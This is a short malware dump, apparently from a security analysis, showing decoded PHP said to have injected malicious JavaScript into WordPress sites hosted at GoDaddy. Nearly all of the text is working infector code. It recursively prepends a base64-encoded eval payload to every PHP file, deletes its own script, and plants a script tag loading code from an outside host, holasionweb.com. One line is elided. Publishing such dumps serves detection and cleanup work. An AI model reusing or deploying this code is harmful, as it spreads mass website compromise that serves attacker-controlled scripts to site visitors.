Description: Code used to insert a malicious javascript on many
wordpress sites at GoDaddy.
Malware dump:
Decoded dump:
set_time_limit(0);
function inject($f,$inj){
global $totalinjected;
$c = file_get_contents($f);
if (strstr($c,"r57shell")) return;
if (strstr($c,"@zend")) return;
if (strstr($c,'<?php /**/ eval(base64_decode(')) return;
if (substr($c,0,10)=='<?php /**/'){
$k=strpos($c,'?>')+2;
$c=substr($c,$k);
}
$c = $inj.$c;
$h2 = @fopen ($f, "w");@fwrite($h2, $c);@fclose($h2);
$totalinjected++;
}
function inject_in_folder($dir){
global $encoded;
if (is_dir($dir)) {
if ($dh = @opendir($dir)) {
while (($file = @readdir($dh)) !== false) {
if (($file==".")||($file==".."))continue;
$k=$dir."/".$file;
if (is_dir($k)){
inject_in_folder($k);
}else{
if (is_file($k)){
$ext=explode(".",$k);
$c=count($ext)-1;
if (strtolower($ext[$c])=="php"){
inject($k,$encoded."n");
}
}
}
}
@closedir($dh);
}
}
}
$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);
$cod=base64_encode('<script src="http://holasionweb.com/oo.php"></script>');
..
$to_pack=base64_encode($to_pack);
$encoded='<?php /**/ eval(base64_decode("'.$to_pack.'"));?>';
$val=dirname($z);
$totalinjected=0;
echo "Working with $valn";
$start_time=microtime(true);
if ($val!="")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time secondsn";